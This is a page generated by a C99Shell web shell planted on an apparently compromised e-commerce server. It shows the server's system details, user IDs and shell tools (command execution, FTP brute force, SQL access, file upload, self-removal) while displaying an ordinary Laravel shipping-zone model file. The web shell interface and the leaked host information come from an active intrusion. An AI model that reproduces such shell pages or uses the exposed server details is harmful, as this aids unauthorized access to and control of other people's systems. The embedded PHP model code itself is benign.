!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Shipping/Entities/   drwxr-xr-x
Free 26.47 GB of 117.98 GB (22.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ShippingZoneGeolocale.php (2.51 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * @package ShippingZoneGeolocale model
 * @author TechVillage <support@techvill.org>
 * @contributor Al Mamun <[almamun.techvill@gmail.com]>
 * @created 19-07-2022
 */

namespace Modules\Shipping\Entities;

use 
App\Models\Model;

class 
ShippingZoneGeolocale extends Model
{
    
/**
     * timestamps
     * @var boolean
     */
    
public $timestamps false;

    
/**
     * Foreign key with ShippingZone model
     *
     * @return \Illuminate\Database\Eloquent\Relations\BelongsTo
     */
    
public function shippingZone()
    {
        return 
$this->belongsTo(ShippingZone::class);
    }

    
/**
     * Store Shipping Zone Geolocale
     *
     * @param array $data
     * @return void
     */
    
public function store($data = [])
    {
        
parent::insert($data);
    }

    
/**
     * Store Shipping Zone Geolocale for API
     *
     * @param array $data
     * @return array $response
     */
    
public function storeData($data)
    {
        
$response = ['status' => 'fail''message' => __('Something went wrong, please try again.')];
        
$id parent::insertGetId($data);
        if (
$id) {
            
$response = ['status' => 'success''id' => $id'message' => __('The :x has been successfully saved.', ['x' => __('Shipping zone location')])];
        }
        return 
$response;
    }

    
/**
     * Update Shipping Zone Geolocale for API
     *
     * @param array $data
     * @param int $id
     * @return array $response
     */
    
public function updateData($data$id)
    {
        
$response = ['status' => 'fail''message' => __('Shipping zone location not found.')];
        
$result parent::where('id'$id);
        if (
$result->exists()) {
            
$result->update($data);
            
$response = ['status' => 'success''message' => __('The :x has been successfully saved.', ['x' => __('Shipping zone location')])];
        }
        return 
$response;
    }

    
/**
     * Delete Shipping Zone Geolocale for API
     *
     * @param array $data
     * @return array $response
     */
    
public function removeData($id null)
    {
        
$response = ['status' => 'fail''message' => __('Shipping zone location not found.')];
        
$record parent::find($id);
        if (!empty(
$record)) {
            
$record->delete();
            
$response = ['status' => 'success''message' =>  __('The :x has been successfully deleted.', ['x' => __('Shipping zone location')])];
        }
        return 
$response;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--